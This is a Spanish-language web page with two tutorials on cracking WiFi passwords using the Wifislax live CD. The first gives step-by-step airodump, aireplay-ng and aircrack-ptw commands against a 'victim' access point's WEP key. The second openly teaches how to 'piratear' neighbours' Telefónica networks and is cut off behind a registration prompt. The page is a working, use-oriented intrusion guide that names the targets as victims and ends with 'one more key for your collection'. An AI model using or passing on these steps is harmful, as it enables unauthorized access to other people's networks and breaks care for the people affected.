Como hackear una red wifi
ANTES DE EMPEZAR TENER EN CUENTA QUE NO NOS HACEMOS RESPONSABLES DEL USO QUE LE PUEDAN DAR AL TUTORIAL, gracias.
Se a porbado satisfactoramente y con buenos resultados. Antes descargar lo suiente y preveer:
LiveCD de Wifislax 3.1. [autor AW]Tarjeta de red, módem o similar (necesario conocer su MAC ID).
Tiempo y paciencia.
Proceso:(seguirlo paso a paso)
1. Arrancamos Wifislax 3.1 desde el LiveCD.
2. Abrimos la consola.
3. tecleamos el comando iwconfig, así sabremos qué usar (tarjeta de red...)
En mi caso tengo un Dlink conectado al USB, así que me quedo con rausb0.
texto inicial texto secundario
4. En la mismaconsola, tecleamos el comando airodump -w archivo -c6 rausb0. Nota: El 6 es el número del canal, puedes elegir el que quieras, pero el 6 es bastante frecuente. Nota2: Recordemos que yo pongo rausb0 porque uso un Dlink conectado al USB.
Te saldrá una lista de los puntos de acceso detectados en el canal anteriormente elegido, simplemente elige el que más te guste, pero que la encriptación seaWEP.
5. Aquí se empieza a complicar, tenemos que abrir una nueva consola y teclear el siguiente comando: aireplay-ng -1 30 -e (ESSID) -a (VICTIMAMAC) -h (TUMAC) rausb0 Explicación:
-(ESSID): ESSID de la víctima.
-(VICTIMAMAC): Dirección MAC de la víctima.
-(TUMAC): MAC del dispositivo que estés usando. La MAC está indicada en el dispositivo.
Con esto asociaremos nuestro dispositivo a laMAC ID de la víctima.
6. Abrimos una nueva consola y tecleamos el comando aireplay-ng -1 30 -e (ESSID) -a
(VICTIMAMAC) -h (TUMAC) rausb0
Ahora sólo puedes rezar para que la víctima esté usando eMule o, si eres ateo, tómate un café. En cualquier caso, deberás esperar a que se envien 100.000 paquetes para continuar (si no empieza a enviar al momento, no te preocupes; es normal).
7.Suponiendo que ya tenemos los 100.000 paquetes enviados (y debería seguir), abrimos una nueva consola y tecleamos el comando aircrack-ptw archivo-01.cap
8. y Listo ...una clave mas para tu coleccion.
Piratear redes WLAN_XX de Telefónica con Wifislax, fácil y divertido
Veamos paso a paso cómo piratear las redes wifi de Telefónica de nuestros vecinos. Sí, piratear. Las cosas por su nombre.
1- Descargar y arrancar WifiSlax
Nos descarmos la distribución completa de WifiSlax. Es una imagen ISO que deberemos grabar en un CD. Una vez hecho esto, reiniciamos el ordenador con el CD de WifiSlax metido en la unidad lectora. Si vuelve a aparecer Windows, hay que modificar las opciones de arranque de la BIOS, cosa que no voy a explicar aquí.
2 - Iniciar el entorno gráfico
Una veziniciado WifiSlax, nos deja en una pantalla en modo texto. Para quien no sepa leer, hay que poner como nombre de usuario "root" y como contraseña "toor". A continuación iniciaremos el entorno gráfico con estos dos comandos:
xconf
startx
Dependiendo del ordenador, el entorno gráfico se verá muy pero que muy feo, a muy baja resolución, por lo que yo suelo ejecutar estos trescomandos en vez de los dos anteriores:
loadkeys es
cp /etc/X11/xorg.conf-vesa /etc/X11/xorg.conf
startx
Esto hace que se utilice el driver estándar para la tarjeta gráfica, lo cual no nos proporciona las mejores prestaciones, pero sí unas bastante aceptables.
Dentro del entorno gráfico necesitaremos dos ventanas de línea de comandos, por lo que pinchamos dos veces en elicono "Shell" del escritorio, recolocando las ventanas como mejor nos convenga para que no se estorben.
3 - Activar y preparar el dispositivo Wifi
Este punto es el que más problemas da con diferencia, porque NO TODAS LAS TARJETAS DE RED WIFI ESTÁN SOPORTADAS. Al final del post he añadido las pocas que la gente me ha dicho que funcionan.
Seguimos. En una de las dos ventanas, ejecutamos:...
Regístrate para leer el documento completo.